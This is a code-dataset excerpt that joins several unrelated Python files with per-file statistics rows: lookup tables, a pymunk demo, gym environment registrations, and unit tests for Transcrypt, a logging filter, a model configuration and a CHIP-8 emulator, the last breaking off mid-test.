table_6C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_6 = [table_60, table_61, table_62, table_63, table_64, table_65, table_66, table_67, table_68, table_69,
table_6A, table_6B, table_6C]
table_70 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_71 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_72 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_73 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_74 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_75 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_76 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_77 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_78 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_79 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_7A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_7B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_7C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_7 = [table_70, table_71, table_72, table_73, table_74, table_75, table_76, table_77, table_78, table_79,
table_7A, table_7B, table_7C]
master_table = [table_0, table_1, table_2, table_3, table_4, table_5, table_6, table_7]
class Orbit:
def __init__(self):
self.number = None
self.is_inner = False
self.is_hab = False
self.is_outer = False
self.is_incinerated = False
self.body = None
| 83.014815 | 114 | 0.292228 | 1,483 | 11,207 | 1.864464 | 0.095752 | 0.300181 | 0.337432 | 0.299458 | 0.537432 | 0.535262 | 0.532369 | 0.532369 | 0.524051 | 0.398192 | 0 | 0.044537 | 0.230659 | 11,207 | 134 | 115 | 83.634328 | 0.276154 | 0.011065 | 0 | 0 | 0 | 0 | 0.140807 | 0 | 0 | 0 | 0 | 0.007463 | 0 | 1 | 0.007692 | false | 0 | 0 | 0 | 0.892308 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
520f207cad089b78c508143b5f906d85f8c2f637 | 1,642 | py | Python | transcrypt/development/automated_tests/transcrypt/executable_comments/__init__.py | JMCanning78/Transcrypt | 8a8dabe831240414fdf1d5027fa2b0d71ab45d05 | [
"Apache-2.0"
] | 1 | 2019-10-14T00:57:04.000Z | 2019-10-14T00:57:04.000Z | transcrypt/development/automated_tests/transcrypt/executable_comments/__init__.py | JMCanning78/Transcrypt | 8a8dabe831240414fdf1d5027fa2b0d71ab45d05 | [
"Apache-2.0"
] | 2 | 2021-03-11T07:09:19.000Z | 2021-05-12T11:26:23.000Z | transcrypt/development/automated_tests/transcrypt/executable_comments/__init__.py | JMCanning78/Transcrypt | 8a8dabe831240414fdf1d5027fa2b0d71ab45d05 | [
"Apache-2.0"
] | 1 | 2021-02-07T00:22:12.000Z | 2021-02-07T00:22:12.000Z | from org.transcrypt.stubs.browser import __pragma__
def run (autoTester):
# __pragma__ ('ecom') # ===================================================================
# --- Executed only by Transcrypt ---
'''?
for i in range (10):
autoTester.check (i)
?'''
# --- Executed only by CPython ---
# __pragma__ ('skip')
for i in range (10):
autoTester.check (i)
# __pragma__ ('noskip')
# --- Executed only by Transcrypt ---
#?autoTester.check (100)
# --- Executed only by CPython ---
autoTester.check (100) #__: skip
#__pragma__ ('noecom') # ===================================================================
# --- Executed by none ---
'''?
for i in range (10, 20):
autoTester.check (i)
?'''
# --- Executed by none ---
#?autoTester.check (200)
__pragma__ ('ecom') # ===================================================================
# --- Executed only by Transcrypt ---
'''?
for i in range (20, 30):
autoTester.check (i)
?'''
# --- Executed only by CPython ---
# __pragma__ ('skip')
for i in range (20, 30):
autoTester.check (i)
# __pragma__ ('noskip')
# --- Executed only by Transcrypt ---
#?autoTester.check (300)
# --- Executed only by CPython ---
autoTester.check (300) #__: skip
__pragma__ ('noecom') # ===================================================================
# --- Executed by none ---
'''?
for i in range (30, 40):
autoTester.check (i)
?'''
# --- Executed by none ---
#?autoTester.check (400)
| 24.147059 | 96 | 0.437881 | 142 | 1,642 | 4.78169 | 0.225352 | 0.265096 | 0.164948 | 0.097202 | 0.880707 | 0.877761 | 0.771723 | 0.771723 | 0.633284 | 0.621502 | 0 | 0.031122 | 0.256395 | 1,642 | 67 | 97 | 24.507463 | 0.52498 | 0.56821 | 0 | 0.2 | 0 | 0 | 0.022173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
522e5ef3fa4278298ee9b9e92220e6db7c937be5 | 482 | py | Python | docs/joint/joint9.py | danbst/pymunk-tutorial | 2012ca168e5de1588404e7ef6d2dd3770df6f291 | [
"MIT"
] | 4 | 2020-09-22T09:02:00.000Z | 2022-03-06T19:42:18.000Z | docs/joint/joint9.py | danbst/pymunk-tutorial | 2012ca168e5de1588404e7ef6d2dd3770df6f291 | [
"MIT"
] | null | null | null | docs/joint/joint9.py | danbst/pymunk-tutorial | 2012ca168e5de1588404e7ef6d2dd3770df6f291 | [
"MIT"
] | 3 | 2021-04-23T09:24:19.000Z | 2022-03-29T17:54:47.000Z | # rachet joint
from joint import *
p0 = Vec2d(100, 120)
v = Vec2d(60, 0)
arm = Segment(p0, v)
PivotJoint(b0, arm.body, p0)
SimpleMotor(b0, arm.body, 1)
arm2 = Segment(p0+v, v)
PivotJoint(arm.body, arm2.body, v)
RatchetJoint(arm.body, arm2.body, 0, math.pi/2)
p0 = Vec2d(300, 120)
arm = Segment(p0, v)
PivotJoint(b0, arm.body, p0)
SimpleMotor(b0, arm.body, 1)
arm2 = Segment(p0+v, v)
PivotJoint(arm.body, arm2.body, v)
RatchetJoint(arm.body, arm2.body, 0, math.pi/8)
App().run() | 20.956522 | 47 | 0.682573 | 87 | 482 | 3.781609 | 0.310345 | 0.170213 | 0.121581 | 0.182371 | 0.790274 | 0.790274 | 0.790274 | 0.790274 | 0.790274 | 0.790274 | 0 | 0.100962 | 0.136929 | 482 | 23 | 48 | 20.956522 | 0.689904 | 0.024896 | 0 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
528b374c5759cc9e56895177c88ffc2889843ed0 | 237 | py | Python | tests/__init__.py | faintlines/flask-expects-json | 72d9d710f17e96d975ce9f470c38ea736d6e813f | [
"MIT"
] | 45 | 2018-02-15T02:24:00.000Z | 2022-03-03T19:22:40.000Z | tests/__init__.py | faintlines/flask-expects-json | 72d9d710f17e96d975ce9f470c38ea736d6e813f | [
"MIT"
] | 20 | 2018-01-30T19:03:48.000Z | 2022-03-04T09:32:29.000Z | tests/__init__.py | faintlines/flask-expects-json | 72d9d710f17e96d975ce9f470c38ea736d6e813f | [
"MIT"
] | 11 | 2019-05-21T12:53:49.000Z | 2021-11-03T12:01:12.000Z | import unittest
def loader():
return unittest.TestLoader().discover('tests', pattern='test*.py')
def test_suite():
return unittest.TestSuite(loader())
def run():
return unittest.TextTestRunner(verbosity=2).run(loader()) | 18.230769 | 70 | 0.708861 | 28 | 237 | 5.964286 | 0.607143 | 0.251497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.135021 | 237 | 13 | 71 | 18.230769 | 0.809756 | 0 | 0 | 0 | 0 | 0 | 0.054622 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | true | 0 | 0.142857 | 0.428571 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
bfeac2a6bbfa4c186d70640701cd5820e4a27929 | 1,201 | py | Python | tests/test_iteration_parameters.py | erdc/AdhModel | 2c5d49dd4cca484a6c46ded6e1f6dec25db4722c | [
"BSD-3-Clause"
] | 3 | 2019-06-26T13:41:46.000Z | 2019-10-16T02:11:29.000Z | tests/test_iteration_parameters.py | erdc/AdhModel | 2c5d49dd4cca484a6c46ded6e1f6dec25db4722c | [
"BSD-3-Clause"
] | 5 | 2019-06-26T14:29:03.000Z | 2019-07-15T19:25:59.000Z | tests/test_iteration_parameters.py | erdc/AdhModel | 2c5d49dd4cca484a6c46ded6e1f6dec25db4722c | [
"BSD-3-Clause"
] | 2 | 2019-07-26T14:31:14.000Z | 2019-09-03T18:06:39.000Z | import unittest
from adhmodel.simulation.iteration_parameters import IterationParameters
class TestIo(unittest.TestCase):
def test_dependency_non_linear_tolerance_option(self):
ip = IterationParameters()
ip.non_linear_tolerance_option = 'Specify residual and incremental (IP NTL & IP ITL)'
self.assertGreater(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertGreater(ip.param.non_linear_incremental_tolerance.precedence, 0)
ip.non_linear_tolerance_option = 'Specify residual (IP NTL)'
self.assertGreater(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertLess(ip.param.non_linear_incremental_tolerance.precedence, 0)
ip.non_linear_tolerance_option = 'Specify incremental (IP ITL)'
self.assertLess(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertGreater(ip.param.non_linear_incremental_tolerance.precedence, 0)
ip.non_linear_tolerance_option = 'Specify residual and incremental (IP NTL & IP ITL)'
self.assertGreater(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertGreater(ip.param.non_linear_incremental_tolerance.precedence, 0)
| 60.05 | 93 | 0.777685 | 147 | 1,201 | 6.068027 | 0.210884 | 0.131166 | 0.089686 | 0.143498 | 0.782511 | 0.782511 | 0.755605 | 0.755605 | 0.755605 | 0.755605 | 0 | 0.007782 | 0.144047 | 1,201 | 19 | 94 | 63.210526 | 0.859922 | 0 | 0 | 0.470588 | 0 | 0 | 0.127394 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
87009b366914ef12134d5d8cfecdf6c8d5107424 | 1,870 | py | Python | gymfc/gymfc/__init__.py | prokhn/onti-2019-bigdata | b9296141958f544177388be94072efce7bdc7814 | [
"MIT"
] | 1 | 2018-12-18T01:19:33.000Z | 2018-12-18T01:19:33.000Z | gymfc/gymfc/__init__.py | prokhn/onti-2019-bigdata | b9296141958f544177388be94072efce7bdc7814 | [
"MIT"
] | null | null | null | gymfc/gymfc/__init__.py | prokhn/onti-2019-bigdata | b9296141958f544177388be94072efce7bdc7814 | [
"MIT"
] | null | null | null | from gym.envs.registration import register
import math
MAX_MEMORY = 11
default_kwargs = {
}
#Episodic task with ESC supporting sensors for telemetry
kwargs = {
"memory_size": 1,
"max_sim_time": 1.,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr-MotorVel_M4_Ep-v0'
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackEnv',
kwargs=kwargs)
# Optionally allow different memories
for i in range(1,MAX_MEMORY):
kwargs = {
"memory_size": i,
"max_sim_time": 1.,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr{}-MotorVel{}_M4_Ep-v0'.format(i, i)
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackEnv',
kwargs=kwargs)
# Continuous task
kwargs = {
"memory_size": 1,
"command_time_off":[0.1, 1.0],
"command_time_on":[0.1, 1.0],
"max_sim_time": 60,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr-MotorVel_M4_Con-v0'
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackContinuousEnv',
kwargs=kwargs)
# And with extra memory
for i in range(1,MAX_MEMORY):
kwargs = {
"memory_size": i,
"command_time_off":[0.1, 1.0],
"command_time_on":[0.1, 1.0],
"max_sim_time": 60,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr{}-MotorVel{}_M4_Con-v0'.format(i, i)
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackContinuousEnv',
kwargs=kwargs)
# For flight control systems without ESC sensors
for i in range(1,MAX_MEMORY):
kwargs = {
"memory_size": i,
"max_sim_time": 1.,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr{}_M4_Ep-v0'.format(i)
register(
id=id,
entry_point='gymfc.envs:GyroErrorFeedbackEnv',
kwargs=kwargs)
| 24.605263 | 75 | 0.648128 | 239 | 1,870 | 4.849372 | 0.246862 | 0.067299 | 0.069025 | 0.107852 | 0.750647 | 0.740293 | 0.740293 | 0.740293 | 0.712683 | 0.712683 | 0 | 0.027701 | 0.227807 | 1,870 | 75 | 76 | 24.933333 | 0.774931 | 0.094118 | 0 | 0.741935 | 0 | 0 | 0.328005 | 0.223209 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.032258 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
870f55149b1e3975c84ca32875c4953c0dfae777 | 2,339 | py | Python | tests/test_filter.py | obss/pigeons | 3965310c8ea45d2948b2ffd42d0369f9baaa4ab4 | [
"MIT"
] | 10 | 2021-07-16T12:51:14.000Z | 2022-01-26T06:30:12.000Z | tests/test_filter.py | obss/pigeons | 3965310c8ea45d2948b2ffd42d0369f9baaa4ab4 | [
"MIT"
] | null | null | null | tests/test_filter.py | obss/pigeons | 3965310c8ea45d2948b2ffd42d0369f9baaa4ab4 | [
"MIT"
] | 1 | 2021-07-16T12:55:06.000Z | 2021-07-16T12:55:06.000Z | import logging
from pigeons.filter import TeamsFilter
def test_filter_without_capture_flags():
log_record_dict = {"msg": "Test log at INFO level.", "levelno": logging.INFO}
test_log_record = logging.makeLogRecord(log_record_dict)
tf = TeamsFilter(level=logging.INFO)
filtered = tf.filter(test_log_record)
assert filtered
def test_filter_with_capture_flags():
capture_flag = "$test_flag "
log_record_dict_true = {"msg": capture_flag + "Test log at INFO level.", "levelno": logging.INFO}
log_record_dict_false = {"msg": "Test log at INFO level.", "levelno": logging.INFO}
test_log_record_true = logging.makeLogRecord(log_record_dict_true)
test_log_record_false = logging.makeLogRecord(log_record_dict_false)
tf = TeamsFilter(level=logging.INFO, capture_flags=[capture_flag])
filtered_true = tf.filter(test_log_record_true)
filtered_false = tf.filter(test_log_record_false)
assert filtered_true and not filtered_false
def test_filter_with_higher_levels():
capture_flag = "$test_flag "
log_record_dict_true = {"msg": capture_flag + "Test log at INFO level.", "levelno": logging.ERROR}
log_record_dict_false = {"msg": "Test log at INFO level.", "levelno": logging.ERROR}
test_log_record_true = logging.makeLogRecord(log_record_dict_true)
test_log_record_false = logging.makeLogRecord(log_record_dict_false)
tf = TeamsFilter(level=logging.INFO, capture_flags=[capture_flag])
# Both should pass regardless of flags.
filtered_true = tf.filter(test_log_record_true)
filtered_false = tf.filter(test_log_record_false)
assert filtered_true and filtered_false
def test_filter_with_lower_levels():
capture_flag = "$test_flag "
log_record_dict_true = {"msg": capture_flag + "Test log at DEBUG level.", "levelno": logging.DEBUG}
log_record_dict_false = {"msg": "Test log at DEBUG level.", "levelno": logging.DEBUG}
test_log_record_true = logging.makeLogRecord(log_record_dict_true)
test_log_record_false = logging.makeLogRecord(log_record_dict_false)
tf = TeamsFilter(level=logging.INFO, capture_flags=[capture_flag])
# Both should fail regardless of flags.
filtered_true = tf.filter(test_log_record_true)
filtered_false = tf.filter(test_log_record_false)
assert not filtered_true and not filtered_false
| 41.767857 | 103 | 0.761009 | 328 | 2,339 | 5.051829 | 0.121951 | 0.152082 | 0.109837 | 0.122511 | 0.900422 | 0.850332 | 0.793603 | 0.793603 | 0.732046 | 0.732046 | 0 | 0 | 0.145789 | 2,339 | 55 | 104 | 42.527273 | 0.829329 | 0.032065 | 0 | 0.473684 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
875299205a616e79629e4dd5496849f44d8700de | 40 | py | Python | bolt/discord/__init__.py | ph7vc/CL4M-B0T | e992cf63b1215ea7c241cab94edc251653dbaed7 | [
"MIT"
] | 9 | 2019-02-17T06:33:14.000Z | 2021-10-05T02:19:00.000Z | bolt/discord/__init__.py | ns-phennessy/Bolt | e992cf63b1215ea7c241cab94edc251653dbaed7 | [
"MIT"
] | 28 | 2019-02-10T07:48:05.000Z | 2021-12-20T00:15:37.000Z | bolt/discord/__init__.py | ph7vc/CL4M-B0T | e992cf63b1215ea7c241cab94edc251653dbaed7 | [
"MIT"
] | 4 | 2015-03-13T03:58:55.000Z | 2015-05-27T08:29:46.000Z | from bolt.discord.events import Events
| 20 | 39 | 0.825 | 6 | 40 | 5.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 40 | 1 | 40 | 40 | 0.942857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
875ef4ba0b572ae3da393904a852db6f94ed6340 | 58 | py | Python | fpdb/common/__init__.py | xvzezi/filedb-python | 513de426976e2782aa9aced1a2bf522db7aae51d | [
"MIT"
] | null | null | null | fpdb/common/__init__.py | xvzezi/filedb-python | 513de426976e2782aa9aced1a2bf522db7aae51d | [
"MIT"
] | null | null | null | fpdb/common/__init__.py | xvzezi/filedb-python | 513de426976e2782aa9aced1a2bf522db7aae51d | [
"MIT"
] | null | null | null | from . import cache
from . import table
from . import util | 19.333333 | 19 | 0.758621 | 9 | 58 | 4.888889 | 0.555556 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189655 | 58 | 3 | 20 | 19.333333 | 0.93617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5e3ecf6e6c8ed986cb6fe625ec64fffdc7fbbaaf | 63 | py | Python | sora/prediction/__init__.py | rcboufleur/SORA | 43a6409af0f6557daa3153ac95798964e1fd59e2 | [
"MIT"
] | 11 | 2021-09-08T15:27:34.000Z | 2022-03-02T16:39:24.000Z | sora/prediction/__init__.py | rcboufleur/SORA | 43a6409af0f6557daa3153ac95798964e1fd59e2 | [
"MIT"
] | 2 | 2021-10-02T09:39:05.000Z | 2022-03-24T12:57:16.000Z | sora/prediction/__init__.py | rcboufleur/SORA | 43a6409af0f6557daa3153ac95798964e1fd59e2 | [
"MIT"
] | 8 | 2021-08-29T12:52:36.000Z | 2022-02-02T06:22:50.000Z | from .core import *
from .table import *
from .occmap import *
| 15.75 | 21 | 0.714286 | 9 | 63 | 5 | 0.555556 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 63 | 3 | 22 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5e4fa681700fff1f5b7915c2893d906c62e94249 | 202 | py | Python | cornflow/schemas/model_json.py | pchtsp/corn | 2811ad400f3f3681a159984eabf4fee1fc99b433 | [
"MIT"
] | 5 | 2021-11-24T02:43:22.000Z | 2021-12-10T09:28:32.000Z | cornflow/schemas/model_json.py | pchtsp/corn | 2811ad400f3f3681a159984eabf4fee1fc99b433 | [
"MIT"
] | 125 | 2021-09-01T12:06:48.000Z | 2022-03-30T11:32:57.000Z | cornflow/schemas/model_json.py | pchtsp/corn | 2811ad400f3f3681a159984eabf4fee1fc99b433 | [
"MIT"
] | 1 | 2021-06-15T19:43:16.000Z | 2021-06-15T19:43:16.000Z | from cornflow_client import SchemaManager, get_pulp_jsonschema
import os
fileDir = os.path.dirname(__file__)
manager = SchemaManager(get_pulp_jsonschema())
DataSchema = manager.jsonschema_to_flask()
| 22.444444 | 62 | 0.831683 | 25 | 202 | 6.28 | 0.68 | 0.203822 | 0.254777 | 0.382166 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094059 | 202 | 8 | 63 | 25.25 | 0.857924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5e7f16ad29f43fd56b8296caf60dbcaca8889209 | 41,041 | py | Python | test/emulator_test.py | kazeraniman/ChipPy | 15669c5dc46ccb76020264698cb4866111d4fe36 | [
"MIT"
] | null | null | null | test/emulator_test.py | kazeraniman/ChipPy | 15669c5dc46ccb76020264698cb4866111d4fe36 | [
"MIT"
] | null | null | null | test/emulator_test.py | kazeraniman/ChipPy | 15669c5dc46ccb76020264698cb4866111d4fe36 | [
"MIT"
] | null | null | null | from unittest import mock
from src.emulator import Emulator, GAME_START_ADDRESS, INTERPRETER_END_ADDRESS, RAM_SIZE, HEX_SIZE, OPCODE_SIZE
class TestHelperMethods:
def setup_method(self):
self.emulator = Emulator()
def test_load_digit_sprites(self):
self.emulator.ram = bytearray(RAM_SIZE)
self.emulator.load_digit_sprites()
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram outside of the sprite storage was modified."
assert self.emulator.ram[0] == int("f0", HEX_SIZE), "The first byte of the 0 sprite is incorrect."
assert self.emulator.ram[1] == int("90", HEX_SIZE), "The second byte of the 0 sprite is incorrect."
assert self.emulator.ram[2] == int("90", HEX_SIZE), "The third byte of the 0 sprite is incorrect."
assert self.emulator.ram[3] == int("90", HEX_SIZE), "The fourth byte of the 0 sprite is incorrect."
assert self.emulator.ram[4] == int("f0", HEX_SIZE), "The fifth byte of the 0 sprite is incorrect."
assert self.emulator.ram[35] == int("f0", HEX_SIZE), "The first byte of the 7 sprite is incorrect."
assert self.emulator.ram[36] == int("10", HEX_SIZE), "The second byte of the 7 sprite is incorrect."
assert self.emulator.ram[37] == int("20", HEX_SIZE), "The third byte of the 7 sprite is incorrect."
assert self.emulator.ram[38] == int("40", HEX_SIZE), "The fourth byte of the 7 sprite is incorrect."
assert self.emulator.ram[39] == int("40", HEX_SIZE), "The fifth byte of the 7 sprite is incorrect."
assert self.emulator.ram[75] == int("f0", HEX_SIZE), "The first byte of the F sprite is incorrect."
assert self.emulator.ram[76] == int("80", HEX_SIZE), "The second byte of the F sprite is incorrect."
assert self.emulator.ram[77] == int("f0", HEX_SIZE), "The third byte of the F sprite is incorrect."
assert self.emulator.ram[78] == int("80", HEX_SIZE), "The fourth byte of the F sprite is incorrect."
assert self.emulator.ram[79] == int("80", HEX_SIZE), "The fifth byte of the F sprite is incorrect."
def test_get_upper_nibble(self):
assert self.emulator.get_upper_nibble(int("5b", HEX_SIZE)) == 5, "Could not get correct upper nibble in normal byte."
assert self.emulator.get_upper_nibble(int("50", HEX_SIZE)) == 5, "Could not get correct upper nibble in byte with 0 lower nibble."
assert self.emulator.get_upper_nibble(int("b", HEX_SIZE)) == 0, "Could not get correct upper nibble in byte no upper nibble."
def test_get_lower_nibble(self):
assert self.emulator.get_lower_nibble(int("5b", HEX_SIZE)) == 11, "Could not get correct lower nibble in normal byte."
assert self.emulator.get_lower_nibble(int("50", HEX_SIZE)) == 0, "Could not get correct lower nibble in byte with 0 lower nibble."
assert self.emulator.get_lower_nibble(int("b", HEX_SIZE)) == 11, "Could not get correct lower nibble in byte no upper nibble."
def test_bounded_subtract(self):
assert self.emulator.bounded_subtract(200, 100) == (100, 1), "Incorrect subtraction with positive result."
assert self.emulator.bounded_subtract(33, 33) == (0, 1), "Incorrect subtraction with 0 result."
assert self.emulator.bounded_subtract(100, 200) == (156, 0), "Incorrect subtraction with negative result."
class TestIndividualOpcodes:
def setup_method(self):
self.emulator = Emulator()
def test_opcode_return_from_subroutine(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert len(self.emulator.stack) == 0, "Stack starting out non-empty."
self.emulator.opcode_return_from_subroutine(bytes.fromhex("00EE"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Returning from a subroutine when not in one messed up the program counter."
assert len(self.emulator.stack) == 0, "Stack got into a weird state when trying to return from a subroutine when not in one."
self.emulator.stack = [2000, 3000]
self.emulator.opcode_return_from_subroutine(bytes.fromhex("00EE"))
assert self.emulator.program_counter == 3000, "Program counter set to wrong value when returning from a subroutine."
assert len(self.emulator.stack) == 1, "Stack entries incorrect after returning from a subroutine."
self.emulator.opcode_return_from_subroutine(bytes.fromhex("00EE"))
assert self.emulator.program_counter == 2000, "Program counter set to wrong value when returning from a subroutine."
assert len(self.emulator.stack) == 0, "Stack entries incorrect after returning from a subroutine."
def test_opcode_goto(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.opcode_goto(bytes.fromhex("14e5"))
assert self.emulator.program_counter == int("4e5", HEX_SIZE), "Program counter incorrect after jump opcode."
def test_opcode_call_subroutine(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert len(self.emulator.stack) == 0, "Stack starting out non-empty."
self.emulator.opcode_call_subroutine(bytes.fromhex("2578"))
assert self.emulator.program_counter == int("578", HEX_SIZE), "Program counter incorrect after subroutine call."
assert len(self.emulator.stack) == 1 and self.emulator.stack[0] == GAME_START_ADDRESS, "Previous program counter not added to the stack."
self.emulator.opcode_call_subroutine(bytes.fromhex("2a23"))
assert self.emulator.program_counter == int("a23", HEX_SIZE), "Program counter incorrect after subroutine call."
assert len(self.emulator.stack) == 2 and self.emulator.stack[1] == int("578", HEX_SIZE), "Previous program counter not added to the stack."
assert len(self.emulator.stack) == 2 and self.emulator.stack[0] == GAME_START_ADDRESS, "Earlier stack value was modified."
def test_opcode_if_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert self.emulator.registers[6] == 0, "Register starting at an unexpected value."
self.emulator.opcode_if_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register value not matching."
